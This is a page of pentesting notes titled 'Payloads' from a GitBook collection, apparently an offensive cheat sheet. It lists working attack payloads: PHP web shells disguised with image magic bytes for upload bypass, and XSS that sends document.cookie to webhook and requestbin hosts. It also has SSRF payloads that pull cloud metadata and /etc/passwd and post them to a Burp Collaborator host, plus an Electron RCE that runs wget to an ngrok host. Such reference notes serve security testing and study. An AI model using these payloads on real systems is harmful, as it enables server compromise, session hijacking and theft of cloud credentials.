PwnSec Notes
  • AppSec
    • General Notes
    • Payloads
    • Fuzzing
    • Code Review
    • ReDos
    • SSTI
    • LFI-RFI
    • PHP Tricks
    • Javascript
    • Serialization
    • SQL Injection
    • JWT
    • GraphQL
    • Side Channel
    • Command Execution
    • WebSockets
    • Ruby
    • 0Auth
    • Latex Injection
    • NoSQL
    • JS Analysis
    • Apache Lucene
  • Forensics
    • Basics
    • Network Captures
    • Windows Logs
    • Memory
    • Browser
    • Threat Intelligence
    • Disk
  • Binary-Exploitation
    • Concepts
    • Binary Analysis
    • Debugging
    • Shellcodes
  • Malware-Analysis
    • Memory Mapping
    • Macros
    • Unpacking
    • Analysis
    • Resources
  • Reverse-Engineering
    • GDB basics
    • MASM Basics
    • Decompilers
    • Useful Codes
  • Services
    • SNMP
    • Grafana
    • Consul
  • Network Pentesting
    • C2 Servers
    • Pivoting
    • CrackMapExec
    • Kubernetes
    • Docker
  • MISC
    • Slack
    • Git
    • Pyjails
    • Privilege Escalation
    • Python LOL Code
  • Cloud Hacking
    • AWS S3
    • AWS Cognito
  • Mobile Pentesting
    • Frida
    • ADB
    • Drozer
    • Smali
    • Static Analysis
    • Dynamic Analysis
    • Bypass SSL Pinning
    • APK Labs
    • Android Malwares
    • Abusing Firebase
    • Root Detection
Powered by GitBook
On this page
  • File Upload
  • Bypass CSP Polyglot JPEG
  • Server Side Request Forgery
  • SVG
  • Meta Tags
  • Style tags
  • HTTP Redirect
  • Edge Side Include
  • Electron RCE
  • More
  • XSS
  • Markdown
  • Payload in hashstring
  1. AppSec

Payloads

PreviousGeneral NotesNextFuzzing

Last updated 1 year ago

File Upload

# JPG
echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg
# PNG
echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png
# GIF
echo -n -e '\x47\x49\x46\x38<?php system($_GET["cmd"]);?>.' > shell.gif
# BMP
echo -n -e '\x42\x4D<?php system($_GET["cmd"]);?>.' > shell.bmp
# WAV (XXE)
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00YOUR_XML_PAYLOAD_HERE\x00' > payload.wav

Bypass CSP Polyglot JPEG

Payload to embed in the picture via hxd (Use this )

document.location='<WEBHOOK>/zeyad?c='+encodeURIComponent(btoa(document.cookie));

Code to execute code as JS

<script charset="ISO-8859-1" src="http://portswigger-labs.net/polyglot/jpeg/xss.jpg"></script>

Research link:

Server Side Request Forgery

SVG

<svg width="100%" height="100%" viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><image xlink:href="https://google.com/favicon.ico" height="20" width="20" onload="fetch('http://169.254.169.254/latest/meta-data/hostname').then(function (response) {response.text().then(function(text) {var params = text;var http = new XMLHttpRequest();var url = 'https://<>.burpcollaborator.net/';http.open('POST', url, true);http.send(params);})});" /></svg>

Meta Tags

<meta http-equiv="refresh" content="0;url=http://169.254.169.254" />

Style tags

<style><h1>h1taginjection</h1><iframe xmlns="http://www.w3.org/1999/xhtml" src="file:///etc/passwd" width="800" height="850"/>
    @import url(http://ta79rlzq77p2kdoak91nqryxlorff4.burpcollaborator.net/import.css);</style>

HTTP Redirect

# ?url=http://your-domain/r.php
# [ r.php ]
<?php
header('Location: http://127.0.0.1:8080/server-status');
?>

Edge Side Include

<esi:include src=http://127.0.0.1/server-status/>
<esi:include src=http://internal_domain/server_base_csrf_page/>

Electron RCE

<head>
        <meta property="og:description" content="<img src=x onerror=&quot;top.require('child_process').execSync('wget https://1a6c-37-36-116-188.eu.ngrok.io')&quot;>">
</head>

More

XSS

Markdown

![<img src="#" onerror="src='http://requestbin.net/r/12bfihl1?c='+document.cookie; this.onerror=null"/>](#){onerror=outerHTML=alt}

Payload in hashstring

"<iframe/onload=eval(atob(location.hash.substring(1)))>"@calc.sh

POC
https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs
https://www.hahwul.com/phoenix/ssrf-open-redirect/
https://github.com/cujanovic/SSRF-Testing